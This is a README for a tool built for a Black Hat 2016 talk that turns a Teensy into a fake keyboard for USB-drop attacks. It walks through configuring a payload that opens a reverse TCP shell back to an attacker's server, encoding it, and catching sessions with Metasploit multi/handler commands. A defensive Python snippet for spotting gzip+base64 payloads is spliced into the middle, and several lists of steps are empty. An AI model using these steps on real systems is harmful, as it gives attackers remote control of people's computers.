Malicious USB
LGPL-3.0 License
This code allows creation of a cross-platform HID spoofing payload that will spawn a reverse TCP-shell on Windows and OS X.
It was developed as part of the presentation I made at Black Hat USA 2016, "Does Dropping USB drives in parking lots and other places really work?", to show how to create realistic HID spoofing keys that can be used in a USB key drop attack.
For more information on how to make a realistic HID spoofing key, see my blog post on the subject.
To get the payload working you need:
If you want to conceal the Teensy in a realistic key, follow the instructions located in the last third of my blog post on the subject.
The payload needs to be configured to connect to the server of your choice. There are two ways to do it:
That is the easy way and should work on most OSX and Linux or even Windows computers as long as Python is installed. To run it simply invoke:
cd payload
python configure_payload.py IP PORT
where IP is the IP of the server and PORT is the TCP port you want the connection back on. Your configured payload is available in the file configured_payload.c.
If you don't have Python, something went wrong, or you want to do it manually, here is what you need to do:
cat payload | gzip -c | base64
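For anyone triaging a recovered key or a suspicious command line, the `gzip -c | base64` step above leaves a recognisable marker: the gzip header always base64-encodes to a string starting with `H4sI`. The following is an added example, not part of the original repository; the function names, the 1 MiB output limit and the sample input are assumptions constructed for illustration.

```python
import base64
import binascii
import gzip
import re
import zlib

# gzip magic bytes 1f 8b 08 always base64-encode to "H4sI".
BLOB_RE = re.compile(r"H4sI[A-Za-z0-9+/]{16,}={0,2}")
# IPv4 literal followed, within 40 non-digit characters, by a port-like number.
ENDPOINT_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3})\b\D{1,40}?\b(\d{2,5})\b")
MAX_OUT = 1 << 20  # assumed cap on decompressed size (decompression-bomb guard)

# Constructed, harmless sample: a placeholder script embedded in a C string.
SAMPLE_SCRIPT = "HOST=192.0.2.10 PORT=4444\necho placeholder\n"
SAMPLE_LINE = ('const char *p = "'
               + base64.b64encode(gzip.compress(SAMPLE_SCRIPT.encode())).decode()
               + '";')


def gunzip_bounded(raw, limit=MAX_OUT):
    """Decompress a gzip stream, refusing truncated or oversized output."""
    d = zlib.decompressobj(31)  # wbits=31: expect a gzip header and trailer
    out = d.decompress(raw, limit)
    if not d.eof:
        raise ValueError("truncated stream or output over limit")
    return out


def find_embedded_payloads(text):
    """Return the decoded text of every gzip+base64 blob found in `text`."""
    results = []
    for m in BLOB_RE.finditer(text):
        blob = m.group(0).rstrip("=")
        blob += "=" * (-len(blob) % 4)  # normalise padding before decoding
        try:
            decoded = gunzip_bounded(base64.b64decode(blob))
        except (binascii.Error, zlib.error, ValueError):
            continue  # looked like a blob but is not valid gzip+base64
        results.append(decoded.decode("utf-8", errors="replace"))
    return results


def extract_endpoints(script):
    """Pull (ip, port) pairs out of a decoded script for blocklisting."""
    return [(ip, int(port)) for ip, port in ENDPOINT_RE.findall(script)
            if all(int(o) <= 255 for o in ip.split(".")) and int(port) <= 65535]
```

Run `find_embedded_payloads` over firmware source, shell history or process command-line logs with line breaks inside the blob removed first, then feed each result to `extract_endpoints`.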
Once the payload is configured, to get your Teensy up and running all you need to do is:
Congratulations, your Teensy is ready to go.
The server side requires a server with a static IP that is reachable from the Internet. We are going to use the generic Metasploit multi handler to control the reverse shell(s). Here is briefly how to do it; for more information, please read the Metasploit documentation.
use exploit/multi/handler
set payload osx/x64/shell_reverse_tcp
Despite the name, it will work for all OSes.
set LHOST YOUR_IP
set LPORT YOUR_PORT
set ExitOnSession false
exploit -j -z
When a key is plugged in, you will see a log message indicating that a new session is connected. You can get the list of sessions by issuing the command:
sessions -l
To control a specific session:
sessions -i session_id